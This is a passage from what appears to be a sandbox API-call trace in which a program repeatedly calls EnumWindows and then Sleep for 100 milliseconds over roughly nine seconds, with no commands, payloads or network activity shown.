lParam=0x410000) [0155.974] Sleep (dwMilliseconds=0x64) [0155.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0155.989] Sleep (dwMilliseconds=0x64) [0156.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.005] Sleep (dwMilliseconds=0x64) [0156.052] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.053] Sleep (dwMilliseconds=0x64) [0156.082] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.083] Sleep (dwMilliseconds=0x64) [0156.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.098] Sleep (dwMilliseconds=0x64) [0156.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.114] Sleep (dwMilliseconds=0x64) [0156.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.129] Sleep (dwMilliseconds=0x64) [0156.144] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.145] Sleep (dwMilliseconds=0x64) [0156.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.161] Sleep (dwMilliseconds=0x64) [0156.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.176] Sleep (dwMilliseconds=0x64) [0156.233] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.233] Sleep (dwMilliseconds=0x64) [0156.261] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.261] Sleep (dwMilliseconds=0x64) [0156.269] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.270] Sleep (dwMilliseconds=0x64) [0156.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.286] Sleep (dwMilliseconds=0x64) [0156.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.301] Sleep (dwMilliseconds=0x64) [0156.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.317] Sleep (dwMilliseconds=0x64) [0156.332] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.332] Sleep (dwMilliseconds=0x64) [0156.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.348] Sleep (dwMilliseconds=0x64) [0156.400] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.401] Sleep (dwMilliseconds=0x64) [0156.454] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.454] Sleep (dwMilliseconds=0x64) [0156.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.457] Sleep (dwMilliseconds=0x64) [0156.474] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.475] Sleep (dwMilliseconds=0x64) [0156.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.489] Sleep (dwMilliseconds=0x64) [0156.506] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.506] Sleep (dwMilliseconds=0x64) [0156.547] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.548] Sleep (dwMilliseconds=0x64) [0156.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.551] Sleep (dwMilliseconds=0x64) [0156.600] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.600] Sleep (dwMilliseconds=0x64) [0156.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.636] Sleep (dwMilliseconds=0x64) [0156.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.645] Sleep (dwMilliseconds=0x64) [0156.660] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.661] Sleep (dwMilliseconds=0x64) [0156.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.677] Sleep (dwMilliseconds=0x64) [0156.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.692] Sleep (dwMilliseconds=0x64) [0156.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.710] Sleep (dwMilliseconds=0x64) [0156.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.723] Sleep (dwMilliseconds=0x64) [0156.774] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.774] Sleep (dwMilliseconds=0x64) [0156.794] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.794] Sleep (dwMilliseconds=0x64) [0156.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.801] Sleep (dwMilliseconds=0x64) [0156.816] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.817] Sleep (dwMilliseconds=0x64) [0156.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.832] Sleep (dwMilliseconds=0x64) [0156.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.849] Sleep (dwMilliseconds=0x64) [0156.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.864] Sleep (dwMilliseconds=0x64) [0156.879] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.879] Sleep (dwMilliseconds=0x64) [0156.931] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.932] Sleep (dwMilliseconds=0x64) [0156.959] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.959] Sleep (dwMilliseconds=0x64) [0156.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.973] Sleep (dwMilliseconds=0x64) [0156.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0156.989] Sleep (dwMilliseconds=0x64) [0157.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.004] Sleep (dwMilliseconds=0x64) [0157.019] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.020] Sleep (dwMilliseconds=0x64) [0157.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.038] Sleep (dwMilliseconds=0x64) [0157.052] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.052] Sleep (dwMilliseconds=0x64) [0157.103] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.104] Sleep (dwMilliseconds=0x64) [0157.125] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.126] Sleep (dwMilliseconds=0x64) [0157.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.129] Sleep (dwMilliseconds=0x64) [0157.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.145] Sleep (dwMilliseconds=0x64) [0157.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.160] Sleep (dwMilliseconds=0x64) [0157.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.176] Sleep (dwMilliseconds=0x64) [0157.191] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.192] Sleep (dwMilliseconds=0x64) [0157.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.207] Sleep (dwMilliseconds=0x64) [0157.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.231] Sleep (dwMilliseconds=0x64) [0157.238] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.239] Sleep (dwMilliseconds=0x64) [0157.273] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.274] Sleep (dwMilliseconds=0x64) [0157.297] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.298] Sleep (dwMilliseconds=0x64) [0157.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.301] Sleep (dwMilliseconds=0x64) [0157.316] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.317] Sleep (dwMilliseconds=0x64) [0157.332] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.332] Sleep (dwMilliseconds=0x64) [0157.347] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.348] Sleep (dwMilliseconds=0x64) [0157.363] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.364] Sleep (dwMilliseconds=0x64) [0157.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.379] Sleep (dwMilliseconds=0x64) [0157.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.395] Sleep (dwMilliseconds=0x64) [0157.443] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.443] Sleep (dwMilliseconds=0x64) [0157.490] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.491] Sleep (dwMilliseconds=0x64) [0157.506] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.507] Sleep (dwMilliseconds=0x64) [0157.537] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.537] Sleep (dwMilliseconds=0x64) [0157.552] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.552] Sleep (dwMilliseconds=0x64) [0157.570] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.570] Sleep (dwMilliseconds=0x64) [0157.582] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.582] Sleep (dwMilliseconds=0x64) [0157.634] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.634] Sleep (dwMilliseconds=0x64) [0157.658] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.659] Sleep (dwMilliseconds=0x64) [0157.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.676] Sleep (dwMilliseconds=0x64) [0157.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.692] Sleep (dwMilliseconds=0x64) [0157.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.708] Sleep (dwMilliseconds=0x64) [0157.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.723] Sleep (dwMilliseconds=0x64) [0157.739] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.739] Sleep (dwMilliseconds=0x64) [0157.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.754] Sleep (dwMilliseconds=0x64) [0157.803] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.804] Sleep (dwMilliseconds=0x64) [0157.824] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.824] Sleep (dwMilliseconds=0x64) [0157.833] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.833] Sleep (dwMilliseconds=0x64) [0157.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.848] Sleep (dwMilliseconds=0x64) [0157.863] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.864] Sleep (dwMilliseconds=0x64) [0157.880] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.880] Sleep (dwMilliseconds=0x64) [0157.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.895] Sleep (dwMilliseconds=0x64) [0157.910] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.910] Sleep (dwMilliseconds=0x64) [0157.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.973] Sleep (dwMilliseconds=0x64) [0157.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0157.988] Sleep (dwMilliseconds=0x64) [0158.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.004] Sleep (dwMilliseconds=0x64) [0158.019] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.020] Sleep (dwMilliseconds=0x64) [0158.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.036] Sleep (dwMilliseconds=0x64) [0158.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.051] Sleep (dwMilliseconds=0x64) [0158.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.067] Sleep (dwMilliseconds=0x64) [0158.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.129] Sleep (dwMilliseconds=0x64) [0158.146] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.147] Sleep (dwMilliseconds=0x64) [0158.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.161] Sleep (dwMilliseconds=0x64) [0158.193] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.193] Sleep (dwMilliseconds=0x64) [0158.236] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.236] Sleep (dwMilliseconds=0x64) [0158.238] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.238] Sleep (dwMilliseconds=0x64) [0158.254] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.254] Sleep (dwMilliseconds=0x64) [0158.295] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.296] Sleep (dwMilliseconds=0x64) [0158.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.301] Sleep (dwMilliseconds=0x64) [0158.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.348] Sleep (dwMilliseconds=0x64) [0158.373] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.373] Sleep (dwMilliseconds=0x64) [0158.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.379] Sleep (dwMilliseconds=0x64) [0158.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.411] Sleep (dwMilliseconds=0x64) [0158.437] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.438] Sleep (dwMilliseconds=0x64) [0158.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.442] Sleep (dwMilliseconds=0x64) [0158.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.458] Sleep (dwMilliseconds=0x64) [0158.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.537] Sleep (dwMilliseconds=0x64) [0158.599] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.599] Sleep (dwMilliseconds=0x64) [0158.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.636] Sleep (dwMilliseconds=0x64) [0158.649] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.650] Sleep (dwMilliseconds=0x64) [0158.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.661] Sleep (dwMilliseconds=0x64) [0158.710] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.711] Sleep (dwMilliseconds=0x64) [0158.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.754] Sleep (dwMilliseconds=0x64) [0158.783] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.784] Sleep (dwMilliseconds=0x64) [0158.812] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.812] Sleep (dwMilliseconds=0x64) [0158.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.848] Sleep (dwMilliseconds=0x64) [0158.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.895] Sleep (dwMilliseconds=0x64) [0158.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.929] Sleep (dwMilliseconds=0x64) [0158.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0158.942] Sleep (dwMilliseconds=0x64) [0159.036] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.037] Sleep (dwMilliseconds=0x64) [0159.054] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.054] Sleep (dwMilliseconds=0x64) [0159.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.067] Sleep (dwMilliseconds=0x64) [0159.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.098] Sleep (dwMilliseconds=0x64) [0159.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.133] Sleep (dwMilliseconds=0x64) [0159.144] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.145] Sleep (dwMilliseconds=0x64) [0159.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.192] Sleep (dwMilliseconds=0x64) [0159.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.207] Sleep (dwMilliseconds=0x64) [0159.246] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.247] Sleep (dwMilliseconds=0x64) [0159.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.271] Sleep (dwMilliseconds=0x64) [0159.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.285] Sleep (dwMilliseconds=0x64) [0159.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.301] Sleep (dwMilliseconds=0x64) [0159.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.349] Sleep (dwMilliseconds=0x64) [0159.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.395] Sleep (dwMilliseconds=0x64) [0159.432] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.432] Sleep (dwMilliseconds=0x64) [0159.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.442] Sleep (dwMilliseconds=0x64) [0159.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.489] Sleep (dwMilliseconds=0x64) [0159.547] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.547] Sleep (dwMilliseconds=0x64) [0159.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.551] Sleep (dwMilliseconds=0x64) [0159.584] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.585] Sleep (dwMilliseconds=0x64) [0159.630] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.631] Sleep (dwMilliseconds=0x64) [0159.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.677] Sleep (dwMilliseconds=0x64) [0159.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.716] Sleep (dwMilliseconds=0x64) [0159.722] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.723] Sleep (dwMilliseconds=0x64) [0159.770] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.770] Sleep (dwMilliseconds=0x64) [0159.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.802] Sleep (dwMilliseconds=0x64) [0159.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.817] Sleep (dwMilliseconds=0x64) [0159.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.864] Sleep (dwMilliseconds=0x64) [0159.911] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.912] Sleep (dwMilliseconds=0x64) [0159.949] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.949] Sleep (dwMilliseconds=0x64) [0159.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.958] Sleep (dwMilliseconds=0x64) [0159.991] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0159.992] Sleep (dwMilliseconds=0x64) [0160.030] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.031] Sleep (dwMilliseconds=0x64) [0160.082] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.082] Sleep (dwMilliseconds=0x64) [0160.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.098] Sleep (dwMilliseconds=0x64) [0160.113] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.114] Sleep (dwMilliseconds=0x64) [0160.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.145] Sleep (dwMilliseconds=0x64) [0160.185] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.185] Sleep (dwMilliseconds=0x64) [0160.191] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.192] Sleep (dwMilliseconds=0x64) [0160.210] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.210] Sleep (dwMilliseconds=0x64) [0160.255] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.256] Sleep (dwMilliseconds=0x64) [0160.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.272] Sleep (dwMilliseconds=0x64) [0160.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.286] Sleep (dwMilliseconds=0x64) [0160.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.317] Sleep (dwMilliseconds=0x64) [0160.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.348] Sleep (dwMilliseconds=0x64) [0160.366] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.366] Sleep (dwMilliseconds=0x64) [0160.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.380] Sleep (dwMilliseconds=0x64) [0160.424] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.425] Sleep (dwMilliseconds=0x64) [0160.474] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.474] Sleep (dwMilliseconds=0x64) [0160.492] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.492] Sleep (dwMilliseconds=0x64) [0160.517] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.518] Sleep (dwMilliseconds=0x64) [0160.567] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.567] Sleep (dwMilliseconds=0x64) [0160.612] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.612] Sleep (dwMilliseconds=0x64) [0160.629] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.629] Sleep (dwMilliseconds=0x64) [0160.677] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.677] Sleep (dwMilliseconds=0x64) [0160.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.723] Sleep (dwMilliseconds=0x64) [0160.756] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.757] Sleep (dwMilliseconds=0x64) [0160.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.770] Sleep (dwMilliseconds=0x64) [0160.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.786] Sleep (dwMilliseconds=0x64) [0160.825] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.825] Sleep (dwMilliseconds=0x64) [0160.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.832] Sleep (dwMilliseconds=0x64) [0160.881] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.881] Sleep (dwMilliseconds=0x64) [0160.926] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.926] Sleep (dwMilliseconds=0x64) [0160.948] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.948] Sleep (dwMilliseconds=0x64) [0160.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.957] Sleep (dwMilliseconds=0x64) [0160.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0160.973] Sleep (dwMilliseconds=0x64) [0161.010] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0161.010] Sleep (dwMilliseconds=0x64) [0161.019] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0161.020] Sleep (dwMilliseconds=0x64) [0161.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0161.067] Sleep (dwMilliseconds=0x64) [0161.119] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0161.119] Sleep (dwMilliseconds=0x64) [0162.828] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0162.828] Sleep (dwMilliseconds=0x64) [0162.923] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0162.923] Sleep (dwMilliseconds=0x64) [0163.037] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.037] Sleep (dwMilliseconds=0x64) [0163.054] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.054] Sleep (dwMilliseconds=0x64) [0163.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.067] Sleep (dwMilliseconds=0x64) [0163.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.098] Sleep (dwMilliseconds=0x64) [0163.146] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.146] Sleep (dwMilliseconds=0x64) [0163.255] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.255] Sleep (dwMilliseconds=0x64) [0163.277] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.277] Sleep (dwMilliseconds=0x64) [0163.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.285] Sleep (dwMilliseconds=0x64) [0163.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.301] Sleep (dwMilliseconds=0x64) [0163.342] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.342] Sleep (dwMilliseconds=0x64) [0163.347] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.348] Sleep (dwMilliseconds=0x64) [0163.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.395] Sleep (dwMilliseconds=0x64) [0163.417] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.417] Sleep (dwMilliseconds=0x64) [0163.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.426] Sleep (dwMilliseconds=0x64) [0163.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.442] Sleep (dwMilliseconds=0x64) [0163.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.489] Sleep (dwMilliseconds=0x64) [0163.553] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.554] Sleep (dwMilliseconds=0x64) [0163.593] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.593] Sleep (dwMilliseconds=0x64) [0163.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.645] Sleep (dwMilliseconds=0x64) [0163.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.692] Sleep (dwMilliseconds=0x64) [0163.719] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.720] Sleep (dwMilliseconds=0x64) [0163.722] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.723] Sleep (dwMilliseconds=0x64) [0163.739] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.739] Sleep (dwMilliseconds=0x64) [0163.809] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.810] Sleep (dwMilliseconds=0x64) [0163.825] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.825] Sleep (dwMilliseconds=0x64) [0163.833] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.833] Sleep (dwMilliseconds=0x64) [0163.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.896] Sleep (dwMilliseconds=0x64) [0163.944] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0163.945] Sleep (dwMilliseconds=0x64) [0164.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.036] Sleep (dwMilliseconds=0x64) [0164.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.077] Sleep (dwMilliseconds=0x64) [0164.082] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.082] Sleep (dwMilliseconds=0x64) [0164.130] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.131] Sleep (dwMilliseconds=0x64) [0164.198] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.199] Sleep (dwMilliseconds=0x64) [0164.240] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.241] Sleep (dwMilliseconds=0x64) [0164.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.272] Sleep (dwMilliseconds=0x64) [0164.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.286] Sleep (dwMilliseconds=0x64) [0164.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.301] Sleep (dwMilliseconds=0x64) [0164.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.350] Sleep (dwMilliseconds=0x64) [0164.363] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.364] Sleep (dwMilliseconds=0x64) [0164.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.379] Sleep (dwMilliseconds=0x64) [0164.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.411] Sleep (dwMilliseconds=0x64) [0164.451] EnumWindows 